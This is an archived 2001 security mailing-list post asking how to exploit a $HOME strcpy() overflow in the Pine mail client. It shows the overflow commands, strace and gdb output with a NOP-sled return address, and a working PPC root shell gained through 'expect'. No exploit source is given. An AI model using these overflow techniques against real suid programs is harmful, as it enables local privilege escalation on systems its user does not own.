Pine

From: Charles Stevenson (coreat_private)
Date: Wed Jul 11 2001 - 19:56:51 PDT

  • Next message: Andrew Barros: "Re: Stack Allocations" 

    Hi all,

Has anyone ever coded a pine exploit.  I know it's vulnerable to a $HOME
strcpy() problem.  And I have seen it suid this or that on several ISPs
even though it shouldn't be ever!  What are the implications of this
with pine itself can you simply run a command from within it.  I don't
think pine was designed to be run as a suid and I'm not sure why anyone
would give it such permissions. 

[-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x
6969'`           [-(:1-07-11-20:20:51)-]<p0>
[-(root@devastator:/home/core/bleedingedge)>
pine                                      [-(:1-07-11-20:21:10)-]<p0>
zsh: segmentation fault  pine
[-(root@devastator:/home/core/bleedingedge)> strace
pine                               [-(:1-07-11-20:21:12)-]<p0>
execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40007000
mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY)      = 3
mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3)                                = 0
stat("/etc/ld.so.preload", 0xbfffe180)  = -1 ENOENT (No such file or
directory)
open("/lib/libtermcap.so.2", O_RDONLY)  = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0)
= 0x4000a000
mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x1000) = 0x4000c000
close(3)                                = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
open("/lib/libc.so.5", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4000d000
mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3,
0) = 0x4000d000
mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x92000) = 0x400a0000
mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
close(3)                                = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 8183)                = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX)                  = 0
geteuid()                               = 0
getuid()                                = 0
getgid()                                = 0
getegid()                               = 11
brk(0x81abb88)                          = 0x81abb88
brk(0x81ac000)                          = 0x81ac000
getpid()                                = 21010
time(NULL)                              = 994904475
getuid()                                = 0
open("/etc/nsswitch.conf", O_RDONLY)    = 3
brk(0x81af000)                          = 0x81af000
fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
read(3, "", 4096)                       = 0
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
open("/etc/passwd", O_RDONLY)           = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
lseek(3, -4070, SEEK_CUR)               = 26
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
brk(0x81b1000)                          = 0x81b1000
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

[-(root@devastator:~/bleedingedge/test)>
./exploit4                                   
[-(:1-07-11-20:34:22)-]<p0>
Using address: 0xbffffcc4
[root@devastator ~/bleedingedge/test]# export HOME=$EGG
[root@devastator /home/core/bleedingedge/test]# gdb pine
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
Inc...
(gdb) r
Starting program: /usr/bin/pine 
zsh: path too long: .zshenv

Program received signal SIGSEGV, Segmentation fault.
0x4007a43f in strcpy ()
(gdb) bt
#0  0x4007a43f in strcpy ()
#1  0x804a590 in _start ()
#2  0x90909090 in ?? ()
Cannot access memory at address 0x90909090.
(gdb) frame 0
#0  0x4007a43f in strcpy ()
(gdb) list
pine.c:252: No such file or directory.


Also I'm not quite understanding coding overflows on x86. I cant seem to
overwrite the eip and my attempts on expect and pine both segfault.  Can
someone tell me what I'm missing.  It's harder but easier on ppc arch.
:)

I mean it works so well on my iBook!

[ Buffer size:  512             Egg size:       2048    Aligment:      
0]
[ Address:      0x100111f8      Offset:         0                       
]
sh-2.05$ export HOME=$EGG
sh-2.05$ expect
sh-2.05# id
uid=0(root) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
sh-2.05# 

I don't feel like building pine for ppc but I'm sure it's just as
simple.

Thanks in advance for any x86 help.

Best Regards,
Charles Stevenson

    This archive was generated by hypermail 2b30 : Thu Jul 12 2001 - 21:46:06 PDT